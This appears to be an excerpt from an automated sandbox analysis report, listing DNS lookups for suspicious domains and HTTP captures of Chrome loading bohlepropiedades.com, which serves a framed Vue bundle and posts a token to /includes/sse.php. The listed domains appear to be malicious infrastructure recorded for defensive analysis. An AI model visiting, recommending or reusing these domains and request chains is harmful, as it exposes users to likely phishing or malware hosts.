                                                                                                          Jan 6, 2025 12:09:22.688884974 CET1.1.1.1192.168.2.40x688No error (0)forspearowor.com104.18.2.4A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.184832096 CET1.1.1.1192.168.2.40x8ed8No error (0)datatechone.com37.48.68.71A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.185915947 CET1.1.1.1192.168.2.40x114cNo error (0)datatechonert.com185.49.145.45A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.889734030 CET1.1.1.1192.168.2.40x7406No error (0)cdntechone.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.889734030 CET1.1.1.1192.168.2.40x7406No error (0)cdntechone.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:23.889796019 CET1.1.1.1192.168.2.40x8d8bNo error (0)cdntechone.com65IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:24.065901041 CET1.1.1.1192.168.2.40xdb6dNo error (0)datatechonert.com185.49.145.45A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:24.345664978 CET1.1.1.1192.168.2.40x6586No error (0)forspearowor.com104.18.3.4A (IP address)IN (0x0001)false
                                                                                                          Jan 6, 2025 12:09:24.345664978 CET1.1.1.1192.168.2.40x6586No error (0)forspearowor.com104.18.2.4A (IP address)IN (0x0001)false
                                                                                                          • bohlepropiedades.com
                                                                                                          • https:
                                                                                                            • www.umbrellaland.fit
                                                                                                            • azz.underbellymeet.asia
                                                                                                            • juvuthoors.com
                                                                                                          • www.terrificstrands.digital
                                                                                                          • wungoangeredsa.com
                                                                                                          • my.rtmark.net
                                                                                                          • cdntechone.com
                                                                                                          • datatechonert.com
                                                                                                          • forspearowor.com
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449755162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:06:50 UTC683OUTGET /M3o2cjJJNkM0MjAyMEo= HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-User: ?1
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:06:50 UTC159INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:06:49 GMT
                                                                                                          Server: Apache
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          2025-01-06 11:06:50 UTC325INData Raw: 31 33 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 39 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 2a 2c 32 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 59 45 53 22 20 62 6f 72 64 65 72 3d 22 36 22 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 3e 0d 0a 3c 66 72 61 6d 65 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 72 63 3d 22 2f 69 6e 63 6c 75 64 65 73 2f 33 7a
                                                                                                          Data Ascii: 139<html><meta http-equiv="X-UA-Compatible" content="IE=9"><meta name="viewport" content="width=device-width, initial-scale=1.0"/><head><frameset rows="*,2" frameborder="YES" border="6" framespacing="0"><frame frameborder="0" src="/includes/3z


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449756162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:06:50 UTC730OUTGET /includes/3z6r2I6C42020J HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: frame
                                                                                                          Referer: https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:06:50 UTC205INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:06:49 GMT
                                                                                                          Server: Apache
                                                                                                          Last-Modified: Tue, 31 Dec 2024 06:17:41 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 490
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html
                                                                                                          2025-01-06 11:06:50 UTC490INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 68 72 65 66 3d 22 2f 69 6e 63 6c 75 64 65 73 2f 76 69 74 65 2e 73 76 67 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <link rel="icon" type="image/svg+xml" href="/includes/vite.svg" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Home</title> <


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449759162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:06:51 UTC631OUTGET /includes/assets/index-B_awNbnU.css HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          Origin: https://bohlepropiedades.com
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://bohlepropiedades.com/includes/3z6r2I6C42020J
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:06:51 UTC203INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:06:50 GMT
                                                                                                          Server: Apache
                                                                                                          Last-Modified: Tue, 31 Dec 2024 06:17:41 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 94
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2025-01-06 11:06:51 UTC94INData Raw: 2e 62 67 2d 62 6c 75 65 5b 64 61 74 61 2d 76 2d 34 64 37 65 30 33 63 38 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 38 39 66 66 61 7d 2e 6d 2d 77 2d 32 35 30 5b 64 61 74 61 2d 76 2d 34 64 37 65 30 33 63 38 5d 7b 6d 61 78 2d 77 69 64 74 68 3a 32 35 30 70 78 7d 0a
                                                                                                          Data Ascii: .bg-blue[data-v-4d7e03c8]{background-color:#489ffa}.m-w-250[data-v-4d7e03c8]{max-width:250px}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449758162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:06:51 UTC616OUTGET /includes/assets/index-qoqlwAed.js HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          Origin: https://bohlepropiedades.com
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://bohlepropiedades.com/includes/3z6r2I6C42020J
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:06:51 UTC221INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:06:50 GMT
                                                                                                          Server: Apache
                                                                                                          Last-Modified: Tue, 31 Dec 2024 06:17:41 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 481611
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2025-01-06 11:06:51 UTC7971INData Raw: 76 61 72 20 64 30 3d 28 65 2c 74 29 3d 3e 28 29 3d 3e 28 74 7c 7c 65 28 28 74 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 29 2e 65 78 70 6f 72 74 73 2c 74 29 2c 74 2e 65 78 70 6f 72 74 73 29 3b 76 61 72 20 56 32 3d 64 30 28 28 68 6e 2c 76 6e 29 3d 3e 7b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 6e 6b 22 29 2e 72 65 6c 4c 69 73 74 3b 69 66 28 74 26 26 74 2e 73 75 70 70 6f 72 74 73 26 26 74 2e 73 75 70 70 6f 72 74 73 28 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 29 29 72 65 74 75 72 6e 3b 66 6f 72 28 63 6f 6e 73 74 20 6f 20 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 6c 69 6e 6b 5b 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72
                                                                                                          Data Ascii: var d0=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var V2=d0((hn,vn)=>{(function(){const t=document.createElement("link").relList;if(t&&t.supports&&t.supports("modulepreload"))return;for(const o of document.querySelectorAll('link[rel="modulepr
                                                                                                          2025-01-06 11:06:51 UTC8000INData Raw: 73 2e 63 6f 6d 70 75 74 65 64 29 72 65 74 75 72 6e 3b 6c 65 74 20 6e 3d 74 68 69 73 2e 61 63 74 69 76 65 4c 69 6e 6b 3b 69 66 28 6e 3d 3d 3d 76 6f 69 64 20 30 7c 7c 6e 2e 73 75 62 21 3d 3d 44 65 29 6e 3d 74 68 69 73 2e 61 63 74 69 76 65 4c 69 6e 6b 3d 6e 65 77 20 54 30 28 44 65 2c 74 68 69 73 29 2c 44 65 2e 64 65 70 73 3f 28 6e 2e 70 72 65 76 44 65 70 3d 44 65 2e 64 65 70 73 54 61 69 6c 2c 44 65 2e 64 65 70 73 54 61 69 6c 2e 6e 65 78 74 44 65 70 3d 6e 2c 44 65 2e 64 65 70 73 54 61 69 6c 3d 6e 29 3a 44 65 2e 64 65 70 73 3d 44 65 2e 64 65 70 73 54 61 69 6c 3d 6e 2c 70 67 28 6e 29 3b 65 6c 73 65 20 69 66 28 6e 2e 76 65 72 73 69 6f 6e 3d 3d 3d 2d 31 26 26 28 6e 2e 76 65 72 73 69 6f 6e 3d 74 68 69 73 2e 76 65 72 73 69 6f 6e 2c 6e 2e 6e 65 78 74 44 65 70 29 29
                                                                                                          Data Ascii: s.computed)return;let n=this.activeLink;if(n===void 0||n.sub!==De)n=this.activeLink=new T0(De,this),De.deps?(n.prevDep=De.depsTail,De.depsTail.nextDep=n,De.depsTail=n):De.deps=De.depsTail=n,pg(n);else if(n.version===-1&&(n.version=this.version,n.nextDep))
                                                                                                          2025-01-06 11:06:51 UTC8000INData Raw: 29 3b 69 66 28 61 3d 3d 3d 30 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 6c 3d 6e 65 77 20 50 72 6f 78 79 28 65 2c 61 3d 3d 3d 32 3f 72 3a 6e 29 3b 72 65 74 75 72 6e 20 6f 2e 73 65 74 28 65 2c 6c 29 2c 6c 7d 66 75 6e 63 74 69 6f 6e 20 43 6f 28 65 29 7b 72 65 74 75 72 6e 20 67 72 28 65 29 3f 43 6f 28 65 2e 5f 5f 76 5f 72 61 77 29 3a 21 21 28 65 26 26 65 2e 5f 5f 76 5f 69 73 52 65 61 63 74 69 76 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 72 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 26 26 65 2e 5f 5f 76 5f 69 73 52 65 61 64 6f 6e 6c 79 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 26 26 65 2e 5f 5f 76 5f 69 73 53 68 61 6c 6c 6f 77 29 7d 66 75 6e 63 74 69 6f 6e 20 61 63 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 21 21 65 2e 5f
                                                                                                          Data Ascii: );if(a===0)return e;const l=new Proxy(e,a===2?r:n);return o.set(e,l),l}function Co(e){return gr(e)?Co(e.__v_raw):!!(e&&e.__v_isReactive)}function gr(e){return!!(e&&e.__v_isReadonly)}function Ht(e){return!!(e&&e.__v_isShallow)}function ac(e){return e?!!e._
                                                                                                          2025-01-06 11:06:51 UTC8000INData Raw: 29 3a 73 7c 7c 64 28 65 2c 74 2c 52 2c 41 2c 6f 2c 69 2c 61 2c 6c 2c 21 31 29 2c 78 29 45 3f 74 2e 70 72 6f 70 73 26 26 65 2e 70 72 6f 70 73 26 26 74 2e 70 72 6f 70 73 2e 74 6f 21 3d 3d 65 2e 70 72 6f 70 73 2e 74 6f 26 26 28 74 2e 70 72 6f 70 73 2e 74 6f 3d 65 2e 70 72 6f 70 73 2e 74 6f 29 3a 6d 69 28 74 2c 6e 2c 53 2c 75 2c 31 29 3b 65 6c 73 65 20 69 66 28 28 74 2e 70 72 6f 70 73 26 26 74 2e 70 72 6f 70 73 2e 74 6f 29 21 3d 3d 28 65 2e 70 72 6f 70 73 26 26 65 2e 70 72 6f 70 73 2e 74 6f 29 29 7b 63 6f 6e 73 74 20 6a 3d 74 2e 74 61 72 67 65 74 3d 72 73 28 74 2e 70 72 6f 70 73 2c 68 29 3b 6a 26 26 6d 69 28 74 2c 6a 2c 6e 75 6c 6c 2c 75 2c 30 29 7d 65 6c 73 65 20 45 26 26 6d 69 28 74 2c 5f 2c 76 2c 75 2c 31 29 3b 4e 69 28 74 2c 78 29 7d 7d 2c 72 65 6d 6f 76
                                                                                                          Data Ascii: ):s||d(e,t,R,A,o,i,a,l,!1),x)E?t.props&&e.props&&t.props.to!==e.props.to&&(t.props.to=e.props.to):mi(t,n,S,u,1);else if((t.props&&t.props.to)!==(e.props&&e.props.to)){const j=t.target=rs(t.props,h);j&&mi(t,j,null,u,0)}else E&&mi(t,_,v,u,1);Ni(t,x)}},remov
                                                                                                          2025-01-06 11:06:51 UTC8000INData Raw: 2c 63 28 65 29 3b 69 66 28 28 64 3d 6c 2e 5f 5f 63 73 73 4d 6f 64 75 6c 65 73 29 26 26 28 64 3d 64 5b 74 5d 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6e 21 3d 3d 41 65 26 26 45 65 28 6e 2c 74 29 29 72 65 74 75 72 6e 20 61 5b 74 5d 3d 34 2c 6e 5b 74 5d 3b 69 66 28 66 3d 73 2e 63 6f 6e 66 69 67 2e 67 6c 6f 62 61 6c 50 72 6f 70 65 72 74 69 65 73 2c 45 65 28 66 2c 74 29 29 72 65 74 75 72 6e 20 66 5b 74 5d 7d 2c 73 65 74 28 7b 5f 3a 65 7d 2c 74 2c 6e 29 7b 63 6f 6e 73 74 7b 64 61 74 61 3a 72 2c 73 65 74 75 70 53 74 61 74 65 3a 6f 2c 63 74 78 3a 69 7d 3d 65 3b 72 65 74 75 72 6e 20 70 6c 28 6f 2c 74 29 3f 28 6f 5b 74 5d 3d 6e 2c 21 30 29 3a 72 21 3d 3d 41 65 26 26 45 65 28 72 2c 74 29 3f 28 72 5b 74 5d 3d 6e 2c 21 30 29 3a 45 65 28 65 2e 70 72 6f 70 73 2c 74 29
                                                                                                          Data Ascii: ,c(e);if((d=l.__cssModules)&&(d=d[t]))return d;if(n!==Ae&&Ee(n,t))return a[t]=4,n[t];if(f=s.config.globalProperties,Ee(f,t))return f[t]},set({_:e},t,n){const{data:r,setupState:o,ctx:i}=e;return pl(o,t)?(o[t]=n,!0):r!==Ae&&Ee(r,t)?(r[t]=n,!0):Ee(e.props,t)
                                                                                                          2025-01-06 11:06:51 UTC8000INData Raw: 74 20 75 3d 5b 61 2c 6c 5d 3b 72 65 74 75 72 6e 20 4c 65 28 65 29 26 26 72 2e 73 65 74 28 65 2c 75 29 2c 75 7d 66 75 6e 63 74 69 6f 6e 20 54 75 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 30 5d 21 3d 3d 22 24 22 26 26 21 78 6f 28 65 29 7d 63 6f 6e 73 74 20 51 67 3d 65 3d 3e 65 5b 30 5d 3d 3d 3d 22 5f 22 7c 7c 65 3d 3d 3d 22 24 73 74 61 62 6c 65 22 2c 63 63 3d 65 3d 3e 62 65 28 65 29 3f 65 2e 6d 61 70 28 58 74 29 3a 5b 58 74 28 65 29 5d 2c 49 62 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 69 66 28 74 2e 5f 6e 29 72 65 74 75 72 6e 20 74 3b 63 6f 6e 73 74 20 72 3d 50 6e 28 28 2e 2e 2e 6f 29 3d 3e 63 63 28 74 28 2e 2e 2e 6f 29 29 2c 6e 29 3b 72 65 74 75 72 6e 20 72 2e 5f 63 3d 21 31 2c 72 7d 2c 4a 67 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 65 2e 5f 63 74 78
                                                                                                          Data Ascii: t u=[a,l];return Le(e)&&r.set(e,u),u}function Tu(e){return e[0]!=="$"&&!xo(e)}const Qg=e=>e[0]==="_"||e==="$stable",cc=e=>be(e)?e.map(Xt):[Xt(e)],Ib=(e,t,n)=>{if(t._n)return t;const r=Pn((...o)=>cc(t(...o)),n);return r._c=!1,r},Jg=(e,t,n)=>{const r=e._ctx
                                                                                                          2025-01-06 11:06:51 UTC8000INData Raw: 3d 28 77 2c 4f 2c 4d 2c 46 2c 59 3d 6e 75 6c 6c 29 3d 3e 7b 63 6f 6e 73 74 7b 65 6c 3a 42 2c 74 79 70 65 3a 4b 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 4e 2c 63 68 69 6c 64 72 65 6e 3a 7a 2c 73 68 61 70 65 46 6c 61 67 3a 6b 7d 3d 77 3b 69 66 28 6b 26 36 29 7b 4a 28 77 2e 63 6f 6d 70 6f 6e 65 6e 74 2e 73 75 62 54 72 65 65 2c 4f 2c 4d 2c 46 29 3b 72 65 74 75 72 6e 7d 69 66 28 6b 26 31 32 38 29 7b 77 2e 73 75 73 70 65 6e 73 65 2e 6d 6f 76 65 28 4f 2c 4d 2c 46 29 3b 72 65 74 75 72 6e 7d 69 66 28 6b 26 36 34 29 7b 4b 2e 6d 6f 76 65 28 77 2c 4f 2c 4d 2c 51 29 3b 72 65 74 75 72 6e 7d 69 66 28 4b 3d 3d 3d 4e 65 29 7b 72 28 42 2c 4f 2c 4d 29 3b 66 6f 72 28 6c 65 74 20 72 65 3d 30 3b 72 65 3c 7a 2e 6c 65 6e 67 74 68 3b 72 65 2b 2b 29 4a 28 7a 5b 72 65 5d 2c 4f 2c 4d 2c
                                                                                                          Data Ascii: =(w,O,M,F,Y=null)=>{const{el:B,type:K,transition:N,children:z,shapeFlag:k}=w;if(k&6){J(w.component.subTree,O,M,F);return}if(k&128){w.suspense.move(O,M,F);return}if(k&64){K.move(w,O,M,Q);return}if(K===Ne){r(B,O,M);for(let re=0;re<z.length;re++)J(z[re],O,M,
                                                                                                          2025-01-06 11:06:51 UTC8000INData Raw: 65 78 74 3a 6e 75 6c 6c 2c 63 74 78 3a 76 74 7d 3b 72 65 74 75 72 6e 20 6c 3f 28 66 63 28 73 2c 6e 29 2c 69 26 31 32 38 26 26 65 2e 6e 6f 72 6d 61 6c 69 7a 65 28 73 29 29 3a 6e 26 26 28 73 2e 73 68 61 70 65 46 6c 61 67 7c 3d 57 65 28 6e 29 3f 38 3a 31 36 29 2c 46 6f 3e 30 26 26 21 61 26 26 77 74 26 26 28 73 2e 70 61 74 63 68 46 6c 61 67 3e 30 7c 7c 69 26 36 29 26 26 73 2e 70 61 74 63 68 46 6c 61 67 21 3d 3d 33 32 26 26 77 74 2e 70 75 73 68 28 73 29 2c 73 7d 63 6f 6e 73 74 20 62 3d 71 62 3b 66 75 6e 63 74 69 6f 6e 20 71 62 28 65 2c 74 3d 6e 75 6c 6c 2c 6e 3d 6e 75 6c 6c 2c 72 3d 30 2c 6f 3d 6e 75 6c 6c 2c 69 3d 21 31 29 7b 69 66 28 28 21 65 7c 7c 65 3d 3d 3d 6d 62 29 26 26 28 65 3d 68 74 29 2c 4d 74 28 65 29 29 7b 63 6f 6e 73 74 20 6c 3d 51 74 28 65 2c 74
                                                                                                          Data Ascii: ext:null,ctx:vt};return l?(fc(s,n),i&128&&e.normalize(s)):n&&(s.shapeFlag|=We(n)?8:16),Fo>0&&!a&&wt&&(s.patchFlag>0||i&6)&&s.patchFlag!==32&&wt.push(s),s}const b=qb;function qb(e,t=null,n=null,r=0,o=null,i=!1){if((!e||e===mb)&&(e=ht),Mt(e)){const l=Qt(e,t
                                                                                                          2025-01-06 11:06:51 UTC8000INData Raw: 6e 28 78 2c 5b 4c 5d 29 2c 61 6e 28 4c 2c 69 29 2c 61 6e 28 4c 2c 61 29 7d 2c 6f 6e 42 65 66 6f 72 65 41 70 70 65 61 72 28 4c 29 7b 4a 6e 28 5f 2c 5b 4c 5d 29 2c 61 6e 28 4c 2c 73 29 2c 61 6e 28 4c 2c 75 29 7d 2c 6f 6e 45 6e 74 65 72 3a 6a 28 21 31 29 2c 6f 6e 41 70 70 65 61 72 3a 6a 28 21 30 29 2c 6f 6e 4c 65 61 76 65 28 4c 2c 48 29 7b 4c 2e 5f 69 73 4c 65 61 76 69 6e 67 3d 21 30 3b 63 6f 6e 73 74 20 6e 65 3d 28 29 3d 3e 41 28 4c 2c 48 29 3b 61 6e 28 4c 2c 64 29 2c 4c 2e 5f 65 6e 74 65 72 43 61 6e 63 65 6c 6c 65 64 3f 28 61 6e 28 4c 2c 66 29 2c 6b 75 28 29 29 3a 28 6b 75 28 29 2c 61 6e 28 4c 2c 66 29 29 2c 6a 75 28 28 29 3d 3e 7b 4c 2e 5f 69 73 4c 65 61 76 69 6e 67 26 26 28 65 72 28 4c 2c 64 29 2c 61 6e 28 4c 2c 70 29 2c 4c 75 28 50 29 7c 7c 48 75 28 4c
                                                                                                          Data Ascii: n(x,[L]),an(L,i),an(L,a)},onBeforeAppear(L){Jn(_,[L]),an(L,s),an(L,u)},onEnter:j(!1),onAppear:j(!0),onLeave(L,H){L._isLeaving=!0;const ne=()=>A(L,H);an(L,d),L._enterCancelled?(an(L,f),ku()):(ku(),an(L,f)),ju(()=>{L._isLeaving&&(er(L,d),an(L,p),Lu(P)||Hu(L
                                                                                                          2025-01-06 11:06:51 UTC8000INData Raw: 61 63 65 28 68 68 2c 22 25 32 33 22 29 2e 72 65 70 6c 61 63 65 28 7a 79 2c 22 25 32 36 22 29 2e 72 65 70 6c 61 63 65 28 4b 79 2c 22 60 22 29 2e 72 65 70 6c 61 63 65 28 62 68 2c 22 7b 22 29 2e 72 65 70 6c 61 63 65 28 79 68 2c 22 7d 22 29 2e 72 65 70 6c 61 63 65 28 6d 68 2c 22 5e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 71 79 28 65 29 7b 72 65 74 75 72 6e 20 66 73 28 65 29 2e 72 65 70 6c 61 63 65 28 6b 79 2c 22 25 33 44 22 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 79 28 65 29 7b 72 65 74 75 72 6e 20 70 63 28 65 29 2e 72 65 70 6c 61 63 65 28 68 68 2c 22 25 32 33 22 29 2e 72 65 70 6c 61 63 65 28 57 79 2c 22 25 33 46 22 29 7d 66 75 6e 63 74 69 6f 6e 20 51 79 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 6e 75 6c 6c 3f 22 22 3a 5a 79 28 65 29 2e 72 65 70 6c 61 63 65 28 46 79
                                                                                                          Data Ascii: ace(hh,"%23").replace(zy,"%26").replace(Ky,"`").replace(bh,"{").replace(yh,"}").replace(mh,"^")}function qy(e){return fs(e).replace(ky,"%3D")}function Zy(e){return pc(e).replace(hh,"%23").replace(Wy,"%3F")}function Qy(e){return e==null?"":Zy(e).replace(Fy


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449763162.214.122.2234438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:06:52 UTC664OUTPOST /includes/sse.php HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 28
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          Accept: application/json
                                                                                                          Content-Type: application/json
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Origin: https://bohlepropiedades.com
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://bohlepropiedades.com/includes/3z6r2I6C42020J
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:06:52 UTC28OUTData Raw: 7b 22 66 61 63 74 6f 72 79 22 3a 22 33 7a 36 72 32 49 36 43 34 32 30 32 30 4a 22 7d
                                                                                                          Data Ascii: {"factory":"3z6r2I6C42020J"}
                                                                                                          2025-01-06 11:06:52 UTC166INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:06:51 GMT
                                                                                                          Server: Apache
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Content-Type: application/json; charset=utf-8
